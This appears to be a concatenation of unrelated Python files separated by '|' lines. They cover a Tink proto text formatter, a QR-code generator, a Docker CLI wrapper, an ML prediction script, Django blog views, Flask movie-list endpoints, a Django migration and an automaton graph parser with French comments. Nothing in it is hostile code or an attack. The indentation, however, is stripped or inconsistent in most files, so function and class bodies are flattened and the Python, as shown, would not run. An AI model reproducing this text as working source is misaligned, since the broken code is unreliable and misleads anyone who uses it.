chacha20_poly1305_pb2.ChaCha20Poly1305KeyFormat)
KeyProto.add_key_type(xchacha20_poly1305_pb2.XChaCha20Poly1305Key,
xchacha20_poly1305_pb2.XChaCha20Poly1305KeyFormat)
KeyProto.add_key_type(aes_siv_pb2.AesSivKey, aes_siv_pb2.AesSivKeyFormat)
KeyProto.add_key_type(aes_ctr_hmac_streaming_pb2.AesCtrHmacStreamingKey,
aes_ctr_hmac_streaming_pb2.AesCtrHmacStreamingKeyFormat)
KeyProto.add_key_type(aes_gcm_hkdf_streaming_pb2.AesGcmHkdfStreamingKey,
aes_gcm_hkdf_streaming_pb2.AesGcmHkdfStreamingKeyFormat)
KeyProto.add_key_type(ecies_aead_hkdf_pb2.EciesAeadHkdfPrivateKey,
ecies_aead_hkdf_pb2.EciesAeadHkdfKeyFormat)
KeyProto.add_key_type(ecies_aead_hkdf_pb2.EciesAeadHkdfPublicKey,
ecies_aead_hkdf_pb2.EciesAeadHkdfKeyFormat)
KeyProto.add_key_type(aes_cmac_pb2.AesCmacKey, aes_cmac_pb2.AesCmacKeyFormat)
KeyProto.add_key_type(hmac_pb2.HmacKey, hmac_pb2.HmacKeyFormat)
KeyProto.add_key_type(ecdsa_pb2.EcdsaPrivateKey, ecdsa_pb2.EcdsaKeyFormat)
KeyProto.add_key_type(ecdsa_pb2.EcdsaPublicKey, ecdsa_pb2.EcdsaKeyFormat)
KeyProto.add_key_type(ed25519_pb2.Ed25519PrivateKey,
ed25519_pb2.Ed25519KeyFormat)
KeyProto.add_key_type(ed25519_pb2.Ed25519PublicKey,
ed25519_pb2.Ed25519KeyFormat)
KeyProto.add_key_type(rsa_ssa_pkcs1_pb2.RsaSsaPkcs1PrivateKey,
rsa_ssa_pkcs1_pb2.RsaSsaPkcs1KeyFormat)
KeyProto.add_key_type(rsa_ssa_pkcs1_pb2.RsaSsaPkcs1PublicKey,
rsa_ssa_pkcs1_pb2.RsaSsaPkcs1KeyFormat)
KeyProto.add_key_type(rsa_ssa_pss_pb2.RsaSsaPssPrivateKey,
rsa_ssa_pss_pb2.RsaSsaPssKeyFormat)
KeyProto.add_key_type(rsa_ssa_pss_pb2.RsaSsaPssPublicKey,
rsa_ssa_pss_pb2.RsaSsaPssKeyFormat)
KeyProto.add_key_type(aes_cmac_prf_pb2.AesCmacPrfKey,
aes_cmac_prf_pb2.AesCmacPrfKeyFormat)
KeyProto.add_key_type(hmac_prf_pb2.HmacPrfKey, hmac_prf_pb2.HmacPrfKeyFormat)
KeyProto.add_key_type(hkdf_prf_pb2.HkdfPrfKey, hkdf_prf_pb2.HkdfPrfKeyFormat)
KeyProto.add_key_type(jwt_ecdsa_pb2.JwtEcdsaPrivateKey,
jwt_ecdsa_pb2.JwtEcdsaKeyFormat)
KeyProto.add_key_type(jwt_ecdsa_pb2.JwtEcdsaPublicKey,
jwt_ecdsa_pb2.JwtEcdsaKeyFormat)
KeyProto.add_key_type(jwt_hmac_pb2.JwtHmacKey, jwt_hmac_pb2.JwtHmacKeyFormat)
KeyProto.add_key_type(jwt_rsa_ssa_pkcs1_pb2.JwtRsaSsaPkcs1PrivateKey,
jwt_rsa_ssa_pkcs1_pb2.JwtRsaSsaPkcs1KeyFormat)
KeyProto.add_key_type(jwt_rsa_ssa_pkcs1_pb2.JwtRsaSsaPkcs1PublicKey,
jwt_rsa_ssa_pkcs1_pb2.JwtRsaSsaPkcs1KeyFormat)
KeyProto.add_key_type(jwt_rsa_ssa_pss_pb2.JwtRsaSsaPssPrivateKey,
jwt_rsa_ssa_pss_pb2.JwtRsaSsaPssKeyFormat)
KeyProto.add_key_type(jwt_rsa_ssa_pss_pb2.JwtRsaSsaPssPublicKey,
jwt_rsa_ssa_pss_pb2.JwtRsaSsaPssKeyFormat)
KeyProto.add_key_type(kms_aead_pb2.KmsAeadKey, kms_aead_pb2.KmsAeadKeyFormat)
KeyProto.add_key_type(kms_envelope_pb2.KmsEnvelopeAeadKey,
kms_envelope_pb2.KmsEnvelopeAeadKeyFormat)
def _text_format_field(value: Any,
                       field: descriptor.FieldDescriptor,
                       indent: str, remove_value: bool) -> str:
  """Returns a text formatted proto field."""
if field.type == TYPE_MESSAGE:
output = [
indent + field.name + ' {',
_text_format_message(value, indent + ' ', remove_value), indent + '}'
]
return '\n'.join(output)
elif field.type == TYPE_ENUM:
value_name = field.enum_type.values_by_number[value].name
return indent + field.name + ': ' + value_name
elif field.type in [TYPE_STRING, TYPE_BYTES]:
return (indent + field.name + ': "' + text_encoding.CEscape(value, False) +
'"')
else:
return indent + field.name + ': ' + str(value)
def _text_format_message(msg: message.Message, indent: str,
                         remove_value: bool) -> str:
  """Returns a text formatted proto message.
Args:
    msg: the proto to be formatted.
    indent: the indentation prefix of each line in the output.
    remove_value: if True, replaces the value fields of tink's custom any protos
      with '<removed>'. This is useful to compare protos, but should not be
      used otherwise.
Returns:
A proto text format output, where serialized fields are deserialized in
a comment.
"""
output = []
fields = msg.DESCRIPTOR.fields
if (len(fields) >= 2 and fields[0].name == 'type_url' and
fields[1].name == 'value'):
# special case for custom 'any' proto.
if getattr(msg, 'type_url'):
type_url = getattr(msg, 'type_url')
output.append(
_text_format_field(type_url, fields[0], indent, remove_value))
if getattr(msg, 'value'):
value = getattr(msg, 'value')
if msg.DESCRIPTOR.full_name == 'google.crypto.tink.KeyTemplate':
# In KeyTemplates, type_url does not match the proto type used.
proto_type = KeyProto.format_from_url(type_url)
else:
proto_type = KeyProto.from_url(type_url)
# parse 'value' and text format the content in a comment.
field_proto = proto_type.FromString(value)
output.append(indent + '# value: [' + TYPE_PREFIX +
proto_type.DESCRIPTOR.full_name + '] {')
output.append(
_text_format_message(field_proto, indent + '# ', remove_value))
output.append(indent + '# }')
if remove_value:
output.append(
_text_format_field('<removed>', fields[1], indent, remove_value))
else:
output.append(
_text_format_field(value, fields[1], indent, remove_value))
fields = fields[2:]
for field in fields:
if field.label == LABEL_REPEATED:
for value in getattr(msg, field.name):
output.append(_text_format_field(value, field, indent, remove_value))
else:
output.append(
_text_format_field(
getattr(msg, field.name), field, indent, remove_value))
return '\n'.join(output)
def text_format(msg: message.Message) -> str:
return _text_format_message(msg, '', False)
def assert_tink_proto_equal(self,
a: message.Message,
b: message.Message,
msg: Optional[str] = None) -> None:
"""Fails with a useful error if a and b aren't equal."""
self.assertMultiLineEqual(
_text_format_message(a, '', True),
_text_format_message(b, '', True),
msg=msg)
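# A minimal usage sketch (assumes the tink-py AEAD key templates are available;
# any KeyTemplate or Keyset proto works the same way):
#
#   from tink import aead
#   print(text_format(aead.aead_key_templates.AES128_EAX))
#
# This prints the template with its serialized `value` field expanded into a
# comment, as shown in the module docstring above.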
|
import pyqrcode
import validators
def createQR(url = 'https://www.github.com/Elry', qrName = 'author'):
url = pyqrcode.create(url)
url.svg(qrName+'.svg', scale = 8)
url.eps(qrName+'.eps', scale = 2)
print(url.terminal(quiet_zone = 1))
def getUrl():
print('Enter link to transform into QR code')
url = str(input())
    while not validators.url(url):
print('Invalid url. E.g: https://www.google.com')
print('Enter link to transform into QR code')
url = str(input())
else:
createQR(url, 'customQR')
createQR()
getUrl() |
import os, sys, docker, json, shutil
class CLI(object):
def __init__(self, settings, debug, force):
self.settings = settings
self.debug = debug
self.force = force
self.options = {
"debug": self.debug,
"force": self.force,
}
self.client = docker.DockerClient(base_url="unix://var/run/docker.sock")
self.services = self.settings.get_service()
self.base_path = settings.get_path()
def parse_args(self, command, params):
#only run setup and install, others have yet to be implemented
if command == "setup":
method = getattr(self, command, None)()
elif command == "config":
method = getattr(self, command, None)(**params)
elif command == "variables":
self.parse_variables(**params)
elif command == "apps":
self.parse_apps(**params)
elif command in ["start", "restart", "stop", "update", "reset"]:
if len(params) > 0:
for i in params:
self.run_container(service=i, action=command)
else:
self.run_container(action=command)
def run_container(self, service=None, action=None):
from Docker import ContainerHandler
container = ContainerHandler(self.settings, self.client, self.options)
        if service is None:
container.run(action)
else:
container.run_service(service, action)
def config(self, command, service, path=None, config=None, default=False):
from lib.config import Settings
        if command == "get":
config = self.settings.get_config(service)
print(json.dumps(config, indent=2))
sys.exit(1)
try:
if not default:
                if config is None:
config = json.load(open(path))
except IsADirectoryError:
            print("The value you specified for '--config' is a directory. This value must be a JSON file")
except TypeError as e:
print("The config you specified is not valid JSON")
finally:
config_path = "%s/settings/%s.json" % (self.base_path, service)
default_path = "%s/settings/default-%s.json" % (self.base_path, service)
config_target = open(config_path, "w")
if not os.path.isfile(default_path):
default_target = open(default_path, "w+")
default_target.write(json.dumps(self.settings.get_config(service), indent=2))
default_target.close()
if not default:
config_target.write(json.dumps(config, indent=2))
else:
config = json.load(open(default_path))
config_target.write(json.dumps(config, indent=2))
config_target.close()
self.settings = Settings(path=self.base_path)
def parse_variables(self, command=None, variable=None, value=None, default=False):
config = self.settings.get_config("variables")
current_value = self.settings.get_variable(variable)
        if current_value is None:
sys.exit(1)
if command == "get":
print(current_value)
sys.exit(1)
if not default:
if "," in value:
config[variable] = value.strip().split(",")
else:
config[variable] = value
self.config("set", "variables", config=config, default=default)
def parse_apps(self, command=None, app=None, default=False):
config = self.settings.get_config("variables")
apps = self.settings.get_variable("applications")
apps_path = self.settings.get_variable("apps-path")
apps_configs = self.settings.get_variable("applications-configs")
if len(apps) == 0 and command in ["list", "enable", "disable", "remove"]:
print("Currently not tracking any applications.\nPlease add an application if you'd like to run '%s'" % command)
sys.exit(1)
if app in apps and command == "add":
print("Application '%s' is currently already being tracked." % app)
sys.exit(1)
if command == "add":
if "," in app:
apps += app.strip().split(",")
else:
apps.append(app)
app_config, error = self.settings.find_app(app)
if error is not None:
if error == "json parse error":
print("Error parsing `app.json` for app `%s`" % app)
elif error == "app no config":
print("Application `%s` doesn't have a `app.json` file." % app)
elif error == "no app dir":
print("Application '%s' isn't a directory in `apps-path` (%s) variable." % (app, config['apps-path']))
sys.exit(1)
else:
# Relative paths used in app.json configs.
# Need to add those relative paths based on apps-path variable
app_config['frontend']['path'] = os.path.join(apps_path, app, app_config['frontend']['path'])
app_config['api']['path'] = os.path.join(apps_path, app, app_config['api']['path'])
app_config['app-dir-name'] = app
app_config['active'] = True
apps_configs.append(app_config)
self.parse_variables(command="set", variable="applications", value=apps)
self.parse_variables(command="set", variable="applications-configs", value=apps_configs)
print(",".join(apps))
elif command == "list":
            print(",".join(apps))
sys.exit(1)
elif command in ["enable", "disable"]:
new_apps_configs = []
for app_config in apps_configs:
if app_config['app-dir-name'] == app:
app_config['active'] = command == "enable"
new_apps_configs.append(app_config)
self.parse_variables(command="set", variable="applications-configs", value=new_apps_configs)
elif command == "remove":
if app not in apps:
                print("Application '%s' requested for removal doesn't exist" % app)
else:
new_apps_configs = [i for i in apps_configs if i['app-dir-name'] != app]
new_apps = [i for i in apps if i != app]
self.parse_variables(command="set", variable="applications", value=new_apps)
self.parse_variables(command="set", variable="applications-configs", value=new_apps_configs)
def setup(self):
from tasks import build
build.run("mongodb", force=self.options['force'])
def tail(self, service, follow=False):
pass |
# -*- coding: utf-8 -*-
"""
This module is for running predictions.
Examples:
Example command line executable::
$ python predict.py
"""
import logging
from pathlib import Path
import click
import pandas as pd
from cloudpickle import load
from orbyter_demo.util.config import parse_config
from orbyter_demo.util.logging import setup_logging
logger = logging.getLogger(__name__)
@click.command()
@click.argument("config_file", type=str, default="/mnt/configs/config.yml")
def predict(config_file):
"""
    Main function that runs predictions.
    Args:
        config_file (str): Path to the YAML configuration file.
Returns:
None
"""
config = parse_config(config_file)
# Load model
logger.info(f"Loading model from {config['predict']['model_path']}.")
model_path = Path(config["predict"]["model_path"])
with open(model_path, "rb") as f:
trained_model = load(f)
# Load data
logger.info(f"Loading input data from {config['predict']['data_path']}.")
data_path = Path(config["predict"]["data_path"])
X = pd.read_parquet(data_path)
# Make predictions and persist
logger.info(
f"Make predictions and persist to {config['predict']['predictions_path']}."
)
yhat = trained_model.predict(X)
yhat = pd.DataFrame(yhat, columns=["MedianHouseValue"])
pred_path = Path(config["predict"]["predictions_path"])
pred_path.parent.mkdir(parents=True, exist_ok=True)
yhat.to_parquet(pred_path)
if __name__ == "__main__":
setup_logging()
predict()
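# A minimal example of the expected config layout (paths are illustrative; the
# keys mirror the config['predict'] lookups above):
#
#   predict:
#     model_path: /mnt/models/model.pkl
#     data_path: /mnt/data/features.parquet
#     predictions_path: /mnt/data/predictions.parquet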
|
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.db.models import Q
from django.shortcuts import get_object_or_404, redirect
from django.utils.translation import ugettext_lazy as _
from django.views.generic import ListView, DetailView
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.edit import FormMixin, CreateView, UpdateView
from .models import Post
from .forms import PostForm, CommentForm
from category.models import Category
class PostListView(ListView):
model = Post
template_name = 'blog/index.html'
extra_context = {'title': _('Posts')}
paginate_by = 5
page_kwarg = 'page'
def get_queryset(self):
posts = Post.objects.all()
query = self.request.GET.get('q', None)
if query:
posts = posts.filter(Q(title__icontains=query) | Q(content__icontains=query)).distinct()
return posts
def get_context_data(self, *args, **kwargs):
data = super().get_context_data(*args, **kwargs)
data['categories'] = Category.objects.filter(type='post')
return data
class PostDetailView(SuccessMessageMixin, FormMixin, DetailView):
model = Post
template_name = 'blog/detail.html'
form_class = CommentForm
success_message = _('Comment is created successfully!')
def get_object(self, queryset=None):
return get_object_or_404(Post, slug=self.kwargs['slug'])
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['title'] = self.object.title
data['meta_description'] = self.object.meta_description
return data
def get_success_url(self):
return self.object.get_absolute_url()
def post(self, request, *args, **kwargs):
# Get object
self.object = self.get_object()
# Form actions
form = self.get_form()
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
def form_valid(self, form):
comment = form.save(commit=False)
comment.post = self.object
comment.save()
return super().form_valid(form)
class PostCreateView(LoginRequiredMixin, SuccessMessageMixin, CreateView):
model = Post
template_name = 'blog/form.html'
extra_context = {'title': _('Create Post')}
form_class = PostForm
success_message = _('Post created successfully')
def get_success_url(self):
return self.object.get_absolute_url()
def form_valid(self, form):
post = form.save(commit=False)
post.user = self.request.user
post.save()
return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = Post
template_name = 'blog/form.html'
    extra_context = {'title': _('Update Post')}
form_class = PostForm
success_message = _('Post updated successfully!')
def get_object(self, queryset=None):
return get_object_or_404(Post, pk=self.kwargs['id'])
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['title'] = '{}: {}'.format(_('Update'), self.object.title)
return data
def get_success_url(self):
return self.object.get_absolute_url()
@login_required
def post_delete(request, id):
# Get post
post = get_object_or_404(Post, id=id)
# Security control
if request.user.is_superuser or post.user == request.user:
post.delete()
return redirect('blog:index')
else:
return redirect('blog:index')
class CategoryDetailView(SingleObjectMixin, ListView):
model = Post
template_name = 'blog/category.html'
paginate_by = 5
def get_object(self, queryset=None):
return get_object_or_404(Category, pk=self.kwargs['id'], slug=self.kwargs['slug'], type='post')
def get(self, request, *args, **kwargs):
self.object = self.get_object()
return super().get(request, *args, **kwargs)
def get_queryset(self):
return Post.objects.filter(category=self.object)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['title'] = self.object.name
data['meta_description'] = self.object.meta_description
data['categories'] = Category.objects.all()
return data
|
from flask import Blueprint, render_template, request, flash, jsonify, session
from flask_login import login_required, current_user
from .models import Movie
from . import db, app_title
import json
from sqlalchemy.sql import func, or_, desc
from time import time_ns
# Create a Flask blueprint, attach this module to it
views = Blueprint( 'views', __name__ )
def get_movies_from_db() :
"""
Fetches movies from the database
Used by other functions in this module
Creates a sorted and filtered list of movies
sorted on current session variable sort_key
filtered on current session variable search_term
    :return: A SQLAlchemy query yielding the matching movies
"""
    # Base query: the current user's movies, searched on title and genre
    base_query = Movie.query.filter(
        Movie.user_id == current_user.id,
        or_(
            func.lower( Movie.title ).contains( session[ 'search_term' ] ),
            func.lower( Movie.genre ).contains( session[ 'search_term' ] )
        )
    )
    # Apply the ordering that matches the current session sort key
    match session[ 'sort_key' ] :
        case 'title' :
            search_result = base_query.order_by( Movie.title ) # Sort on title
        case 'title_reverse' :
            search_result = base_query.order_by( desc( Movie.title ) ) # Sort on title, reversed
        case 'genre' :
            search_result = base_query.order_by( Movie.genre ) # Sort on genre
        case 'genre_reverse' :
            search_result = base_query.order_by( desc( Movie.genre ) ) # Sort on genre, reversed
        case 'length' :
            search_result = base_query.order_by( Movie.length ) # Sort on length
        case 'length_reverse' :
            search_result = base_query.order_by( desc( Movie.length ) ) # Sort on length, reversed
        case _ :
            search_result = base_query.order_by( Movie.position ) # Default: sort on position
    return search_result
@views.post( '/' )
@login_required
def home_post() :
"""
Reads form data that was sent from the webpage
Validates movie title length that was sent in the form
Registers the movie in the database
:return: The home page
"""
# Get form data
form_title = request.form.get( 'movie_title' )
form_img_url = request.form.get( 'movie_img' )
form_genre = request.form.get( 'movie_genre' )
form_length = request.form.get( 'movie_length' )
# See if form data is valid
if len( form_title ) < 1 :
flash( 'Title is too short!', category = 'error' )
else :
# Attempt was successful
# Create new movie object
new_movie = Movie( title = form_title, img_src = form_img_url, genre = form_genre, length = form_length, user_id = current_user.id )
# Register the movie in the database
current_user.movies.append( new_movie )
current_user.movies.reorder()
db.session.commit()
flash( 'Movie was added!', category = 'success' )
# Show the home page
return home_get()
@views.get( '/' )
@login_required
def home_get() :
"""
Shows the home page
Initializes a few session vars
:return: The home HTML page using a Flask template
"""
# Init missing session variables that are used to sort or search movies
    if 'search_term' not in session : session[ 'search_term' ] = ''
    if 'sort_key' not in session : session[ 'sort_key' ] = ''
    if 'sortbtn_title_reverse' not in session : session[ 'sortbtn_title_reverse' ] = False
    if 'sortbtn_genre_reverse' not in session : session[ 'sortbtn_genre_reverse' ] = False
    if 'sortbtn_length_reverse' not in session : session[ 'sortbtn_length_reverse' ] = False
# Populate list with movies with default sorting
search_result = get_movies_from_db()
# Log some info
print( f'current_user: [{current_user}]' )
sep = ''
for m in current_user.movies : print( f'{sep}(p:{m.position} t:{m.title} i:{m.id})', end='' ); sep = ', '
print( '' )
# Return the page
return render_template( 'home.html', app_title = app_title, user = current_user, search_result = search_result, sort_key = session[ 'sort_key' ], time = time_ns() )
@views.post( '/delete-movie' )
@login_required
def delete_movie() :
"""
This function removes the movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie :
if movie.user_id == current_user.id :
#db.session.delete( movie )
current_user.movies.remove( movie )
current_user.movies.reorder()
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( {} )
@views.post( '/done-movie' )
@login_required
def done_movie() :
"""
Marks the movie with a matching id as watched
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_done = req_movie[ 'done' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie and movie.user_id == current_user.id:
movie.done = movie_done
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.post( '/update-movie-title' )
@login_required
def update_movie_title() :
"""
This function updates the title for a movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_title = req_movie[ 'title' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie and movie.user_id == current_user.id:
movie.title = movie_title
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.post( '/update-movie-genre' )
@login_required
def update_movie_genre() :
"""
This function updates the genre for a movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_genre = req_movie[ 'genre' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie and movie.user_id == current_user.id:
movie.genre = movie_genre
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.post( '/update-movie-length' )
@login_required
def update_movie_length() :
"""
Updates the length for a movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_length = req_movie[ 'length' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
# Was the movie found?
if movie and movie.user_id == current_user.id:
movie.length = movie_length
# Register the change in the database
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.post( '/update-poster' )
@login_required
def update_movie_poster() :
"""
This function updates the poster image url for a movie with a matching id
Reads JSON data that was sent
Updates the database if a movie matching the id in the JSON was found
:return: Empty JSON
"""
# Get JSON data that was sent
req_movie = json.loads( request.data )
movie_id = req_movie[ 'id' ]
movie_poster_url = req_movie[ 'poster_url' ]
# Find first movie in the database matching the id
movie = Movie.query.get( movie_id )
if movie and movie.user_id == current_user.id:
movie.img_src = movie_poster_url
db.session.commit()
# Must return something, return empty JSON
return jsonify( { } )
@views.get( '/search' )
@login_required
def search_get() :
"""
This is used for searching movies on title or genre
:return: HTML list elements containing the movies
"""
# Get form data
search_term = request.args.get( 'q' )
if search_term : session[ 'search_term' ] = search_term
else : session[ 'search_term' ] = ''
# Log some info
print( f'session sort_key: [{session[ "sort_key" ]}]' )
print( f'session search_term: [{session[ "search_term" ]}]' )
search_result = get_movies_from_db()
return render_template( 'movies.html', search_result = search_result, query = search_term, sort_key = session[ 'sort_key' ] )
@views.post( '/arrange' )
@login_required
def arrange_post() :
"""
Used for rearranging the movies in the list
Reads JSON data that was sent
"""
# Get JSON data that was sent
json_data = json.loads( request.data )
movie_id = json_data.get( 'id' )
movie_placement = json_data.get( 'placement' )
# Find the movie in db
qm = Movie.query.get( movie_id )
# Make sure the placement is valid
alts = [ 'first', 'up', 'down', 'last' ]
if qm and movie_placement in alts :
# Log some info
print( f'p:{qm.position} t:{qm.title} i:{qm.id} where:[{movie_placement}]' )
# Remove movie from list
movie = current_user.movies.pop( qm.position )
new_position = qm.position
match movie_placement :
case 'first' :
current_user.movies.insert( 0, movie )
case 'up' :
new_position -= 1
if new_position <= 0 : new_position = 0
current_user.movies.insert( new_position, movie )
case 'down' :
new_position += 1
current_user.movies.insert( new_position, movie )
case 'last' :
current_user.movies.append( movie )
case _ :
print( 'Not allowed!' )
current_user.movies.reorder()
db.session.commit()
return render_template( 'movies.html', search_result = current_user.movies )
@views.get( '/sort' )
@login_required
def sort_get() :
"""
Used for sorting
Takes a query parameter that is used as a sort key
:return: A key-sorted list of HTML LI elements containing the movies
"""
# Save current session sort key
old_session_key = session[ 'sort_key' ]
# Get query vars
received_key = request.args.get( 'key' )
# Log some info
print( f'received key from ui: [{received_key}], old session key: [{old_session_key}]' )
# Set the sort key to a sane state
if not received_key : received_key = ''
# Reverse the sorting order only if the user requested same sort key a second time in a row
new_session_key = received_key
if received_key == 'title' : # Assuming that the user has clicked on the sort button "Title"
        if 'title' in old_session_key : # Same button was clicked twice in a row, change the state
if session[ 'sortbtn_title_reverse' ] :
session[ 'sortbtn_title_reverse' ] = False
new_session_key = 'title'
else :
session[ 'sortbtn_title_reverse' ] = True
new_session_key = 'title_reverse'
else : # Different button was clicked than before, keep same state
if session[ 'sortbtn_title_reverse' ] :
new_session_key = 'title_reverse'
else :
new_session_key = 'title'
if received_key == 'genre' :
        if 'genre' in old_session_key : # Same button was clicked twice in a row, change the state
if session[ 'sortbtn_genre_reverse' ] :
session[ 'sortbtn_genre_reverse' ] = False
new_session_key = 'genre'
else :
session[ 'sortbtn_genre_reverse' ] = True
new_session_key = 'genre_reverse'
else : # Different button was clicked than before, keep same state
if session[ 'sortbtn_genre_reverse' ] :
new_session_key = 'genre_reverse'
else :
new_session_key = 'genre'
if received_key == 'length' :
        if 'length' in old_session_key : # Same button was clicked twice in a row, change the state
if session[ 'sortbtn_length_reverse' ] :
session[ 'sortbtn_length_reverse' ] = False
new_session_key = 'length'
else :
session[ 'sortbtn_length_reverse' ] = True
new_session_key = 'length_reverse'
else : # Different button was clicked than before, keep same state
if session[ 'sortbtn_length_reverse' ] :
new_session_key = 'length_reverse'
else :
new_session_key = 'length'
# Log some info
print( f'current key: [{new_session_key}]' )
# Set session variable sort_key which is used to sort the list
session[ 'sort_key' ] = new_session_key
search_result = get_movies_from_db()
# Return the movies page
return render_template( 'movies.html', search_result = search_result, query = new_session_key, sort_key = new_session_key )
@views.get( '/ui/sort-buttons' )
@login_required
def sortbtns_get() :
"""
Used for rendering of sort buttons in GUI
:return: HTML code describing the sort buttons
"""
# Create default button states
sort_buttons = []
sort_buttons.append( { 'btn_id' : 'btn_sort_off', 'btn_class' : 'btn-outline-success', 'label': 'Sort:Off', 'sort_key': '', 'reverse' : False } )
sort_buttons.append( { 'btn_id' : 'btn_sort_title', 'btn_class' : 'btn-outline-success', 'label': 'Title', 'sort_key': 'title', 'reverse' : session[ 'sortbtn_title_reverse' ] } )
sort_buttons.append( { 'btn_id' : 'btn_sort_genre', 'btn_class' : 'btn-outline-success', 'label': 'Genre', 'sort_key': 'genre', 'reverse' : session[ 'sortbtn_genre_reverse' ] } )
sort_buttons.append( { 'btn_id' : 'btn_sort_length', 'btn_class' : 'btn-outline-success', 'label': 'Length', 'sort_key': 'length', 'reverse' : session[ 'sortbtn_length_reverse' ] } )
# Modify states of the sort buttons depending on the current session var sort_key
# This changes the jinja variable used for rendering the html page for sort buttons
match session[ 'sort_key' ].removesuffix( '_reverse' ) :
case '' : sort_buttons[ 0 ][ 'btn_class' ] = 'btn-success'
case 'title' : sort_buttons[ 1 ][ 'btn_class' ] = 'btn-success'
case 'genre' : sort_buttons[ 2 ][ 'btn_class' ] = 'btn-success'
case 'length' : sort_buttons[ 3 ][ 'btn_class' ] = 'btn-success'
# Return the buttons page
return render_template( 'sortbtns.html', sort_key = session[ 'sort_key' ], sort_buttons = sort_buttons, time = time_ns() )
|
# Generated by Django 3.0.10 on 2020-11-09 15:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cms', '0068_bibliography_surname'),
]
operations = [
migrations.RenameField(
model_name='bibliographyentry',
old_name='author_firstame',
new_name='author_firstname',
),
]
|
from src.Transition import *
class Graph(object):
"""Clase d'un graphe/automate
Traite un fichier.txt et retourne l'alphabet, l'état initial, états finaux,
alphabet, les états et transitions
Attributes:
transitions (list): Liste des transitions de type 'Transition'
finalStates (list): Liste des états finaux (str)
alphabet (list): L'alphabet du langage
states (list): Liste des états de l'automate (str)
initialState (str): Etat initial de l'automate
"""
def __init__(self, file=None):
"""Constructeur de la classe du graphe
Le constructeur initialise tout les paramètres du graphe à
des valeurs vides, sauf le fichier s'il est donné en paramètre.
Args:
file (file): Fichier txt contenant le graphe
"""
if (file):
self.file = file
self.transitions = [] # transitions
        self.finalStates = [] # final states
        self.alphabet = [] # alphabet
        self.states = [] # states
        self.initialState = '' # initial state
def parse(self):
"""Fonction de traitement d'un fichier txt
La fonction lis le fichier txt contenant le graphe
et génère un objet de type Graph, donc un automate.
"""
counter = 0
if self.file != None:
for line in self.file:
                # the first line contains the final states
if (counter == 0):
                    # store them
self.finalStates = line.rstrip().split(' ')
                # rest of the file = transitions
                # First element of the first transition line = initial state
                # For each line, add the state and the alphabet symbol if they don't already exist
elif (counter == 1):
self.initialState = line.rstrip().split(' ')[0]
line = line.rstrip().split(' ')
self.states.append(line[0])
if (line[0] != line[2]):
self.states.append(line[2])
self.transitions.append(
Transition(line[0], line[1], line[2]))
if (line[1] not in self.alphabet):
self.alphabet.append(line[1])
else:
line = line.rstrip().split(' ')
if (line[0] not in self.states):
self.states.append(line[0])
if (line[2] not in self.states):
self.states.append(line[2])
self.transitions.append(
Transition(line[0], line[1], line[2]))
if (line[1] not in self.alphabet):
self.alphabet.append(line[1])
counter += 1
self.close()
def getStateTransitions(self, state):
"""Récupérer toutes les transitions possibles d'un noeud (state)
Fonction qui prend un état, et récupère toutes les transitions possible
depuis ce dernier.
Args:
state (str): Etat de départ
Returns:
list: Liste des transitions possibles
"""
transFromState = []
for node in self.gettransitions():
if (node.mFrom == state):
transFromState.append(node)
return transFromState
    # Get all possible transitions from a node (state) when reading the letter (letter)
def getStateTransitionsLetter(self, state, letter):
"""Récupérer toutes les transitions possibles d'un noeud en lisant une lettre
Fonction qui prend un état et une lettre de l'alphabet,
et récupère toutes les transitions possible en lisant cette lettre
depuis ce dernier.
Args:
state (str): Etat de départ
letter (str): Lettre de l'alphabet
Returns:
list: Liste des transitions possibles
"""
transFromState = []
for node in self.gettransitions():
if (node.mFrom == state and node.mValue == letter):
transFromState.append(node)
return transFromState
def nodeToString(self, node):
"""Fonction pour afficher un noeud en chaine de caractère
Args:
node (Transition): Un noeud (départ, lettre, arrivé)
Returns:
str: Le noeud sous forme de chaine de caractères
"""
return f"Read {node.mValue} from {node.mFrom} to {node.mGoto}"
def close(self):
        # Close the file at the end
self.file.close()
# getters
def getAlphabet(self):
return self.alphabet
def getFinalStates(self):
return self.finalStates
def gettransitions(self):
return self.transitions
def getStates(self):
return self.states
def getInitialState(self):
return self.initialState
# setters
def setAlphabet(self, alphabet):
self.alphabet = alphabet
def setFinalStates(self, final_states):
self.finalStates = final_states
def settransitions(self, nodes):
self.transitions = nodes
